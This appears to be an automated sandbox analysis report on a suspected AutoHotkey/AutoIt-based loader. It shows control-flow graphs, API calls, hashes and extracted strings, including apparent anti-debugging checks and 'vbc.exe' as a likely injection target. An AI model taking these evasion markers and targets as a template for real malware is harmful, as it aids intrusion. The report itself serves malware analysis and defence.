                                      • Executed
                                      • Not Executed
                                      control_flow_graph 871 489eb61-489eb64 872 489eb69-489eb6e 871->872 872->872 873 489eb70-489ebd6 call 4847301 call 4844f7d call 4876655 call 4872111 call 4875a5d 872->873 884 489ebd8-489ebe7 call 4874631 call 487522d 873->884 885 489ebec-489ec18 call 4874fc1 call 4875195 call 484520d call 4875a5d 873->885 884->885 897 489ec8a-489ec96 call 4875e39 885->897 898 489ec1a-489ec85 call 4874fc1 call 4875195 call 484520d call 4872a0d call 4874729 call 4874fc1 call 4875195 call 484520d call 4874631 Sleep 885->898 904 489ecb8-489eccc Sleep call 485bcd1 call 4870f91 call 4894aa9 897->904 905 489ec98-489ecb3 call 4845251 call 4874a1d 897->905 898->897 919 489ecd1-489ecef call 4856e99 call 4870d31 904->919 905->904 930 489ecf1-489ed00 call 4844f7d 919->930 931 489ed02-489ed20 call 4856e99 call 4870d31 919->931 939 489ed73-489ed7b 930->939 946 489ed33-489ed51 call 4856e99 call 4870d31 931->946 947 489ed22-489ed31 call 4844f7d 931->947 943 489ed7d-489ed85 939->943 944 489ed87-489edbb call 4857599 * 2 939->944 943->944 945 489ede3-489edeb 943->945 944->945 963 489edbd-489eddd call 487202d call 4848b09 call 4845351 944->963 952 489eded-489edf5 945->952 953 489edf7 call 4872995 945->953 967 489ed53-489ed62 call 4844f7d 946->967 968 489ed64-489ed6e call 4844f7d 946->968 947->939 952->953 957 489edfc-489ee11 call 4871cd5 call 4845351 952->957 953->957 973 489eeb5-489ef01 call 4875195 call 4845251 call 4875195 call 4845251 957->973 974 489ee17-489ee36 call 4874f89 call 484520d call 4875a5d 957->974 963->945 988 489f171-489f18e call 4844f4d 963->988 967->939 968->939 999 489eff2-489f01b call 486f779 call 4856e99 call 4870d31 973->999 1000 489ef07-489ef0e call 4869c8d 973->1000 974->973 996 489ee38-489eeb2 call 48743c1 call 48699d1 call 4849741 call 48743c1 call 4874f89 call 484520d call 4872a0d call 4874729 call 4874f89 call 484520d call 4874631 974->996 996->973 1022 489f01d-489f025 999->1022 1023 489f036-489f063 call 486bdfd GetCurrentThreadId call 4871cd5 call 4845351 999->1023 1000->999 1010 489ef14-489ef32 call 4856e99 call 4870d31 1000->1010 1025 489ef54-489ef81 call 4875285 call 484520d call 4873e49 call 4844f7d 1010->1025 1026 489ef34-489ef52 call 4856e99 call 4870d31 1010->1026 1022->1023 1028 489f027-489f02f 1022->1028 1052 489f069-489f091 call 4874f89 call 484520d call 4875a5d 1023->1052 1053 489f12f-489f13b call 4875e39 1023->1053 1066 489efd4-489efeb call 486f235 call 486de4d 1025->1066 1026->1025 1048 489ef83-489efa1 call 4856e99 call 4870d31 1026->1048 1028->1023 1033 489f031 call 486e3a5 1028->1033 1033->1023 1048->1066 1073 489efa3-489efcf call 48438ed call 4873e49 call 4844f7d 1048->1073 1052->1053 1093 489f097-489f12a call 4874f89 call 484520d call 4872a0d call 4874f89 call 484520d call 4872a0d call 4874f89 call 484520d call 4872a0d call 4874f89 call 484520d call 4872a0d 1052->1093 1068 489f13d-489f14c call 486d7d9 call 48727ad 1053->1068 1069 489f151-489f16c call 4874f89 call 48727ad call 486da41 call 489d2d5 1053->1069 1066->999 1095 489efed call 487522d 1066->1095 1068->1069 1069->988 1073->1066 1093->1053 1095->999
                                      APIs
                                      • Sleep.KERNEL32(000007D0,00000000,0489F18F,?,00000000,00000000), ref: 0489EC85
                                      • Sleep.KERNEL32(00000064,00000000,0489F18F,?,00000000,00000000), ref: 0489ECBA
                                      • GetCurrentThreadId.KERNEL32 ref: 0489F03B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CurrentThread
                                      • String ID: 6.5.1$AHK$AU3$DLL$Yes$abby$autoit3.exe$c.txt$c:\debugg$c:\temp\just_test.txt$c:\temp\test_ok$c:\tes2\$cc.txt$debug 0 $mutex0$mutex1$script.a3x$test$test.txt$u.txt$uu.txt$vbc.exe
                                      • API String ID: 1849766040-536896633
                                      • Opcode ID: 3bc5122a482c3deacd309c444fe6eead752a92e886d603710d7e9008071071f6
                                      • Instruction ID: 3329acff9ade6336c40520280c85159055d1b2c90b77af72792144adee436825
                                      • Opcode Fuzzy Hash: 3bc5122a482c3deacd309c444fe6eead752a92e886d603710d7e9008071071f6
                                      • Instruction Fuzzy Hash: 6AF13834A005088BFF14EBA8D490A9CB3A5EF4660CF584F91EA14EB755DBB4FD498B12
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404370 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 252COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1124 404370-404393 FindResourceW 1125 404395 1124->1125 1126 40439b-4043a3 1124->1126 1125->1126 1127 4043a9 1126->1127 1128 4045fe-40461a call 404af0 1126->1128 1129 4043b0-4043c8 call 499c29 1127->1129 1134 404620-404642 call 42d170 1128->1134 1135 4044fb-404504 1128->1135 1136 4045e4 1129->1136 1137 4043ce-4043de call 499c29 1129->1137 1144 404644-404669 call 42d420 1134->1144 1145 40466e-404672 1134->1145 1139 4045ea-4045f2 1136->1139 1137->1136 1146 4043e4-4043f4 call 499c29 1137->1146 1139->1129 1142 4045f8 1139->1142 1142->1128 1144->1145 1145->1135 1148 404678-404694 call 478ec0 1145->1148 1154 4043fa-40440a call 499c29 1146->1154 1155 4045dc-4045e2 1146->1155 1148->1135 1153 40469a-4046bb call 483650 call 41dd30 1148->1153 1154->1155 1161 404410-404422 call 49a3aa 1154->1161 1155->1139 1165 404424-404429 1161->1165 1166 404447-404457 call 499c29 1161->1166 1167 404430 1165->1167 1168 40442b-40442e 1165->1168 1173 404460-404463 1166->1173 1174 404459-40445b 1166->1174 1170 404432-404442 call 41d360 1167->1170 1168->1170 1170->1139 1173->1128 1176 404469-404479 call 499c29 1173->1176 1174->1139 1179 4044a1-4044b1 call 499c29 1176->1179 1180 40447b-404483 1176->1180 1185 4044b3-4044bb 1179->1185 1186 404505-404517 call 49a3aa 1179->1186 1180->1135 1181 404485-40448b 1180->1181 1181->1135 1183 40448d-40449c 1181->1183 1183->1139 1185->1135 1188 4044bd-4044c9 call 49a782 1185->1188 1191 404519-404526 call 404070 1186->1191 1192 40452b-40453d call 49a3aa 1186->1192 1196 4044d6 1188->1196 1197 4044cb-4044d4 call 404140 1188->1197 1191->1139 1202 404543-40454a 1192->1202 1203 4045fa-4045fc 1192->1203 1201 4044d8-4044f5 call 47da40 1196->1201 1197->1201 1201->1135 1201->1139 1206 404555-404558 1202->1206 1207 40454c-40454f 1202->1207 1203->1128 1209 40455a-40456c call 49a802 1206->1209 1210 4045bc-4045da call 404c60 * 2 1206->1210 1207->1203 1207->1206 1215 404597-4045ba call 47d380 call 404c60 1209->1215 1216 40456e-404595 call 47d380 * 2 1209->1216 1210->1139 1215->1139 1216->1139
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FindResource__wcsnicmp
                                      • String ID: $mM$*#1$/CP$/Debug$/ErrorStdOut$/force$/iLib$/include$/restart$/script$9000$A_Args$localhost
                                      • API String ID: 3944913069-1584552616
                                      • Opcode ID: 8dfb7e424f5f28b303d49cc310f6af046d1e3a3d5f69a19a1a6f354707d8da0b
                                      • Instruction ID: 4ea2c535b0a9603de5d2aa5e19152a5ce38d98647489de704cc40f934b39f973
                                      • Opcode Fuzzy Hash: 8dfb7e424f5f28b303d49cc310f6af046d1e3a3d5f69a19a1a6f354707d8da0b
                                      • Instruction Fuzzy Hash: 73712BB1B442016BD711AB69AC42B6B37949BA1709F14403FFE05A63C2F77DDE0582AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044C070 Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 457COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1626 44c070-44c0ad call 41a400 1629 44c0b1 1626->1629 1630 44c0b3-44c0b9 1629->1630 1631 44c0c0-44c0c3 1630->1631 1632 44c0bb-44c0be 1630->1632 1631->1630 1632->1631 1633 44c0c5-44c0c9 1632->1633 1634 44c0cf-44c0dc 1633->1634 1635 44c26a-44c288 CreateFileW 1633->1635 1636 44c0f0-44c0f9 1634->1636 1637 44c0de-44c0eb call 49b90c 1634->1637 1638 44c2a5-44c2b5 call 4810b0 1635->1638 1639 44c28a-44c2a0 GetLastError 1635->1639 1641 44c0ff-44c106 1636->1641 1642 44c24b-44c24f 1636->1642 1637->1636 1656 44c0ed 1637->1656 1660 44c2b7-44c2dd GetLastError CloseHandle call 43bee0 1638->1660 1661 44c2e0-44c2e6 1638->1661 1643 44c220 1639->1643 1641->1642 1649 44c246 1641->1649 1650 44c117-44c146 call 404010 call 49a08b 1641->1650 1651 44c10d-44c112 1641->1651 1652 44c1bf-44c1d5 call 49a0cd 1641->1652 1642->1629 1648 44c255-44c25c 1642->1648 1645 44c226-44c243 call 483320 1643->1645 1646 44c5db-44c5f7 call 439cd0 1643->1646 1648->1629 1657 44c262-44c265 1648->1657 1649->1642 1685 44c17d-44c190 1650->1685 1686 44c148 1650->1686 1651->1642 1673 44c1d7 1652->1673 1674 44c20d-44c219 1652->1674 1656->1636 1657->1629 1663 44c2f2-44c2f4 1661->1663 1664 44c2e8 1661->1664 1671 44c2f6-44c2f9 1663->1671 1672 44c2fb-44c317 call 43a140 1663->1672 1669 44c2ee-44c2f0 1664->1669 1670 44c2ea-44c2ec 1664->1670 1669->1663 1670->1663 1670->1669 1671->1672 1677 44c31a-44c31e 1671->1677 1679 44c1e0-44c1ed 1673->1679 1674->1643 1682 44c355-44c35a 1677->1682 1683 44c320-44c32d CloseHandle 1677->1683 1684 44c1f0-44c1f3 1679->1684 1692 44c35c-44c365 1682->1692 1693 44c3aa-44c3bf call 49a0ee 1682->1693 1688 44c334-44c352 call 483320 1683->1688 1689 44c1f5-44c1ff 1684->1689 1690 44c1b7-44c1ba 1684->1690 1685->1646 1687 44c196-44c1b4 call 483320 1685->1687 1691 44c150-44c15d 1686->1691 1689->1684 1699 44c201-44c20b 1689->1699 1690->1642 1700 44c160-44c163 1691->1700 1694 44c367-44c36a 1692->1694 1695 44c36d-44c36f 1692->1695 1708 44c3c1-44c3e5 call 43a140 CloseHandle 1693->1708 1709 44c3e8-44c412 ReadFile GetLastError FindCloseChangeNotification 1693->1709 1694->1695 1695->1693 1702 44c371-44c383 call 43bc50 1695->1702 1699->1674 1699->1679 1700->1690 1701 44c165-44c16f 1700->1701 1701->1700 1706 44c171-44c17b 1701->1706 1717 44c385-44c395 call 401280 1702->1717 1718 44c397-44c398 CloseHandle 1702->1718 1706->1685 1706->1691 1710 44c585-44c59e call 41a7d0 1709->1710 1711 44c418-44c41d 1709->1711 1728 44c5a0-44c5a6 call 49a18d 1710->1728 1729 44c5a9-44c5b9 call 41a8f0 1710->1729 1714 44c423-44c42a 1711->1714 1715 44c51e-44c527 1711->1715 1720 44c456-44c459 1714->1720 1721 44c42c-44c42f 1714->1721 1723 44c52f-44c531 1715->1723 1724 44c529-44c52c 1715->1724 1717->1709 1717->1718 1726 44c39e-44c3a7 1718->1726 1733 44c45f-44c462 1720->1733 1734 44c4fb-44c507 1720->1734 1721->1720 1727 44c431-44c435 1721->1727 1731 44c565-44c56d 1723->1731 1732 44c533-44c553 call 483160 call 49a18d 1723->1732 1724->1723 1727->1720 1737 44c437-44c43b 1727->1737 1728->1729 1729->1726 1758 44c5bf-44c5d8 call 439dd0 1729->1758 1742 44c574-44c583 call 41a7d0 1731->1742 1743 44c56f-44c573 1731->1743 1732->1688 1765 44c559-44c562 1732->1765 1733->1734 1741 44c468-44c46c 1733->1741 1735 44c474-44c478 1734->1735 1736 44c50d-44c519 call 483ed0 1734->1736 1751 44c480-44c48d call 483320 1735->1751 1752 44c47a-44c47d 1735->1752 1759 44c492-44c494 1736->1759 1737->1720 1746 44c43d-44c454 call 483ed0 1737->1746 1741->1734 1750 44c472 1741->1750 1742->1729 1743->1742 1746->1759 1750->1735 1751->1759 1752->1751 1763 44c496 1759->1763 1764 44c498-44c49a 1759->1764 1763->1764 1767 44c4a5-44c4b7 call 401280 1764->1767 1768 44c49c-44c4a2 call 49a18d 1764->1768 1767->1729 1773 44c4bd-44c4f6 call 41a840 call 480750 call 41a800 1767->1773 1768->1767 1773->1729
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoui64
                                      • String ID: Out of memory.
                                      • API String ID: 3882282163-4087320997
                                      • Opcode ID: e109cf9613345e516351f5e4b6e26f657ca4ddc7ec6fd38ec1da9edf0244ba5f
                                      • Instruction ID: 10bcdced3b1fd273e0f3236f0e5bb612d4932cb3b4d7f7201b7a786520782577
                                      • Opcode Fuzzy Hash: e109cf9613345e516351f5e4b6e26f657ca4ddc7ec6fd38ec1da9edf0244ba5f
                                      • Instruction Fuzzy Hash: 53E166716053005BE7209F698CC1BBB7790AB95324F18062FF9919B3C2DB7DD84687AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00431775 Relevance: 25.2, APIs: 11, Strings: 3, Instructions: 702windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$_free$ClipboardCloseGlobalMessagePeekUnlock_wcschr
                                      • String ID: D$SMHD$v1j
                                      • API String ID: 1021975077-266152296
                                      • Opcode ID: 6fb21f818125d9475a097eff479efa0a17ed8342e2308a683a023ebab6e656d2
                                      • Instruction ID: f7e77dbd848ad812e51f72988eb8a59d72245f57d710ad1e6037afe51a8d010e
                                      • Opcode Fuzzy Hash: 6fb21f818125d9475a097eff479efa0a17ed8342e2308a683a023ebab6e656d2
                                      • Instruction Fuzzy Hash: 4E42D070608341CFD724DF14D890B6BB7E1AB89314F146A2FE8858B3A1D779EC85CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00431035 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 575windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • __wcsicoll.LIBCMT ref: 00431307
                                        • Part of subcall function 00438630: _wcsncpy.LIBCMT ref: 004386E3
                                        • Part of subcall function 00438630: _wcschr.LIBCMT ref: 0043872A
                                        • Part of subcall function 00438630: _memmove.LIBCMT ref: 00438776
                                        • Part of subcall function 00438630: _wcschr.LIBCMT ref: 00438783
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                        • Part of subcall function 0041AFD0: __wcsicoll.LIBCMT ref: 0041B0DC
                                        • Part of subcall function 0041AFD0: __wcsicoll.LIBCMT ref: 0041B0F4
                                        • Part of subcall function 0041CEA0: __fassign.LIBCMT ref: 0041CEB0
                                      • __wcsicoll.LIBCMT ref: 004310A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$CountTick_wcschr$ClipboardCloseGlobalMessagePeekUnlock__fassign_memmove_wcsncpy
                                      • String ID: CSV$Parameter #2 invalid.$Parameter #3 invalid.$Read$v1j
                                      • API String ID: 1197092883-2063208240
                                      • Opcode ID: 67f6c7dea7ce6972e0d480ecda0304d9e2e7464eea458bde37fd68bcb011f90e
                                      • Instruction ID: b3bfa134d8ccc7a34a7196c784ca034fcbc288a249cfb7be489ac4d864bae0da
                                      • Opcode Fuzzy Hash: 67f6c7dea7ce6972e0d480ecda0304d9e2e7464eea458bde37fd68bcb011f90e
                                      • Instruction Fuzzy Hash: 4C229C71608340DFD714CF54D880BABB7E5AB88314F149A2FF989873A1D778E845CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004347FA Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 253windowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2387 4347fa-434812 call 49a3aa 2390 4348e0-4348f7 call 49a3aa 2387->2390 2391 434818-434825 call 42cbc0 2387->2391 2396 43278b-432790 2390->2396 2397 4348fd-43490c 2390->2397 2398 431eb5-431eb9 2391->2398 2399 43482b-43484c call 42cc50 call 49a90e 2391->2399 2397->2396 2402 434912-434919 2397->2402 2400 435021-435037 2398->2400 2401 431ebf 2398->2401 2412 43485e-434860 2399->2412 2413 43484e-43485c call 404070 2399->2413 2405 431ec2 2401->2405 2406 434931-434939 2402->2406 2407 434920-434927 2402->2407 2409 431ec6 2405->2409 2407->2406 2411 431eca-431ecc 2409->2411 2414 431ed2-431ed6 2411->2414 2415 430d54 2411->2415 2418 434862-434870 2412->2418 2413->2418 2414->2396 2419 430a54-430a5b 2414->2419 2416 430d59-430d6d 2415->2416 2423 434872 2418->2423 2424 434884-4348a0 call 47fe10 2418->2424 2421 430a8e-430aa8 GetTickCount 2419->2421 2422 430a5d-430a64 2419->2422 2428 430adb-430ae2 2421->2428 2429 430aaa-430ac2 PeekMessageW 2421->2429 2425 430a66-430a72 GlobalUnlock 2422->2425 2426 430a7c-430a89 CloseClipboard 2422->2426 2423->2396 2427 434878-43487e 2423->2427 2440 4348a2 2424->2440 2441 4348a7-4348b1 2424->2441 2425->2426 2426->2421 2427->2396 2427->2424 2431 430ae4-430aeb 2428->2431 2432 430b0c-430b14 2428->2432 2433 430ad0-430ad6 GetTickCount 2429->2433 2434 430ac4-430acd call 4014c0 2429->2434 2431->2432 2436 430aed-430af6 2431->2436 2437 430b16 2432->2437 2438 430b2f-430b35 2432->2438 2433->2428 2434->2433 2436->2432 2442 430af8-430afd 2436->2442 2443 430b18-430b1b 2437->2443 2444 430b1d-430b23 2437->2444 2445 430b37-430b3f 2438->2445 2446 430b4d-430b54 2438->2446 2440->2441 2448 4348b3 2441->2448 2449 4348b8-4348db call 49a830 2441->2449 2453 430b08-430b09 2442->2453 2454 430aff-430b06 2442->2454 2443->2438 2443->2444 2455 430b41-430b4a call 4014c0 2444->2455 2456 430b25 2444->2456 2445->2446 2445->2455 2450 430b56 2446->2450 2451 430b78-430b85 2446->2451 2448->2449 2449->2398 2457 430b60-430b76 call 4014c0 2450->2457 2459 430bc0-430bc7 2451->2459 2460 430b87-430bb4 GetTickCount 2451->2460 2453->2432 2454->2432 2455->2446 2456->2438 2461 430b27-430b2d 2456->2461 2457->2451 2465 430bd5-430bd9 2459->2465 2466 430bc9-430bcc 2459->2466 2460->2459 2464 430bb6 2460->2464 2461->2438 2461->2455 2464->2459 2470 430bdb-430bdd 2465->2470 2471 430bfe 2465->2471 2466->2465 2469 430bce-430bd0 call 406023 2466->2469 2469->2465 2470->2471 2474 430bdf-430be1 2470->2474 2473 430c01-430c0d 2471->2473 2475 430c13-430c16 2473->2475 2476 430d70-430d88 2473->2476 2474->2471 2477 430be3-430bf6 call 466130 2474->2477 2475->2476 2478 430c1c-430c33 call 435990 2475->2478 2483 430e62-430e79 2476->2483 2484 430d8f-430da6 2476->2484 2477->2400 2485 430bfc 2477->2485 2492 430cc5-430ccf 2478->2492 2493 430c39-430c3f 2478->2493 2489 430e7b-430e89 call 44df90 2483->2489 2490 430e8f-430e9d 2483->2490 2487 430e22-430e32 call 44df90 2484->2487 2488 430da8-430db8 2484->2488 2485->2473 2509 435369-43537f 2487->2509 2510 430e38-430e43 2487->2510 2494 430dd4-430ddf call 401300 2488->2494 2495 430dba-430dca 2488->2495 2489->2490 2489->2509 2497 430e9f-430ea8 2490->2497 2498 430eae-430eb7 2490->2498 2499 430cd1-430cd7 2492->2499 2500 430d4a-430d4e 2492->2500 2503 430c41-430c5c call 4309f0 2493->2503 2504 430c60-430c6f call 4309f0 2493->2504 2520 430de1-430df1 2494->2520 2521 430dfb-430dfd 2494->2521 2495->2494 2497->2405 2497->2498 2507 430cd9 2499->2507 2508 430cff-430d0e call 4309f0 2499->2508 2500->2409 2500->2415 2526 430c5e 2503->2526 2524 430c73-430c75 2504->2524 2514 430ce0-430cfb call 4309f0 2507->2514 2530 430d12-430d16 2508->2530 2515 430e45-430e4f call 44e050 2510->2515 2516 430e5b-430e5d 2510->2516 2533 430cfd 2514->2533 2515->2516 2534 430e51-430e56 2515->2534 2516->2494 2520->2521 2521->2400 2527 430e03-430e06 2521->2527 2524->2411 2531 430c7b-430c7f 2524->2531 2526->2524 2527->2400 2532 430e0c-430e10 2527->2532 2535 43501b-43501f 2530->2535 2536 430d1c-430d1f 2530->2536 2531->2535 2537 430c85-430c88 2531->2537 2538 430e16-430e1d 2532->2538 2539 43503a-435042 2532->2539 2533->2530 2534->2495 2535->2400 2536->2535 2542 430d25-430d27 2536->2542 2537->2535 2543 430c8e-430c90 2537->2543 2538->2409 2539->2416 2541 435048-43505e 2539->2541 2546 430d29-430d2f 2542->2546 2547 430d3e-430d45 2542->2547 2544 430c92-430c98 2543->2544 2545 430ca7-430cb1 2543->2545 2548 430c9e-430ca2 2544->2548 2549 431b0c-431b12 2544->2549 2545->2409 2551 430cb7-430cc0 2545->2551 2546->2549 2550 430d35-430d39 2546->2550 2547->2409 2548->2409 2549->2405 2549->2415 2550->2409 2551->2409
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      • __wcsnicmp.LIBCMT ref: 00434808
                                      • _wcschr.LIBCMT ref: 0043483E
                                      • __swprintf.LIBCMT ref: 004348CE
                                        • Part of subcall function 00404070: __wcstoi64.LIBCMT ref: 00404080
                                      • __wcsnicmp.LIBCMT ref: 004348ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$__wcsnicmp$ClipboardCloseGlobalMessagePeekUnlock__swprintf__wcstoi64_wcschr
                                      • String ID: %%%s%s%s$Float$Integer$v1j
                                      • API String ID: 2402484164-2641105242
                                      • Opcode ID: 34fbe2e23b42e3702df13e9bdc27c237454fec4696a458d2f8beee5494b01c50
                                      • Instruction ID: f9064c7bbdae209e6c78806b0421e91406ef30e2b7197535e8a870e46e02f5d5
                                      • Opcode Fuzzy Hash: 34fbe2e23b42e3702df13e9bdc27c237454fec4696a458d2f8beee5494b01c50
                                      • Instruction Fuzzy Hash: 1FA13531A04241CBDB28DB24DC95B6A77A1AB49318F14673FE8598B3E1D77CD880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00434E42 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238registrywindowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2897 434e42-434e48 2898 434eb1-434ed5 call 41afd0 2897->2898 2899 434e4a-434e54 2897->2899 2908 434ed7-434ee7 2898->2908 2909 434ee9 2898->2909 2901 434e56-434e5a 2899->2901 2902 434e94 2899->2902 2905 434e8a-434e92 2901->2905 2906 434e5c-434e88 call 47ffb0 2901->2906 2903 434e99-434eac call 47ce20 2902->2903 2903->2898 2905->2903 2906->2903 2912 434eef-434ef3 2908->2912 2909->2912 2914 434ef5-434ef7 2912->2914 2915 434ef9-434f09 call 499c29 2912->2915 2916 434f10-434f24 call 47ce20 2914->2916 2915->2916 2921 434f0b 2915->2921 2922 434f2a-434f2c 2916->2922 2923 431ead-431eaf 2916->2923 2921->2916 2922->2923 2924 434f32-434f39 RegCloseKey 2922->2924 2925 435021-435037 2923->2925 2926 431eb5-431eb9 2923->2926 2924->2923 2926->2925 2927 431ebf 2926->2927 2928 431ec2 2927->2928 2929 431ec6 2928->2929 2930 431eca-431ecc 2929->2930 2931 431ed2-431ed6 2930->2931 2932 430d54 2930->2932 2934 430a54-430a5b 2931->2934 2935 43278b-432790 2931->2935 2933 430d59-430d6d 2932->2933 2936 430a8e-430aa8 GetTickCount 2934->2936 2937 430a5d-430a64 2934->2937 2940 430adb-430ae2 2936->2940 2941 430aaa-430ac2 PeekMessageW 2936->2941 2938 430a66-430a72 GlobalUnlock 2937->2938 2939 430a7c-430a89 CloseClipboard 2937->2939 2938->2939 2939->2936 2942 430ae4-430aeb 2940->2942 2943 430b0c-430b14 2940->2943 2944 430ad0-430ad6 GetTickCount 2941->2944 2945 430ac4-430ac8 call 4014c0 2941->2945 2942->2943 2946 430aed-430af6 2942->2946 2947 430b16 2943->2947 2948 430b2f-430b35 2943->2948 2944->2940 2955 430acd 2945->2955 2946->2943 2950 430af8-430afd 2946->2950 2951 430b18-430b1b 2947->2951 2952 430b1d-430b23 2947->2952 2953 430b37-430b3f 2948->2953 2954 430b4d-430b54 2948->2954 2958 430b08-430b09 2950->2958 2959 430aff-430b06 2950->2959 2951->2948 2951->2952 2960 430b41-430b45 call 4014c0 2952->2960 2961 430b25 2952->2961 2953->2954 2953->2960 2956 430b56 2954->2956 2957 430b78-430b85 2954->2957 2955->2944 2962 430b60-430b76 call 4014c0 2956->2962 2963 430bc0-430bc7 2957->2963 2964 430b87-430bb4 GetTickCount 2957->2964 2958->2943 2959->2943 2971 430b4a 2960->2971 2961->2948 2965 430b27-430b2d 2961->2965 2962->2957 2969 430bd5-430bd9 2963->2969 2970 430bc9-430bcc 2963->2970 2964->2963 2968 430bb6 2964->2968 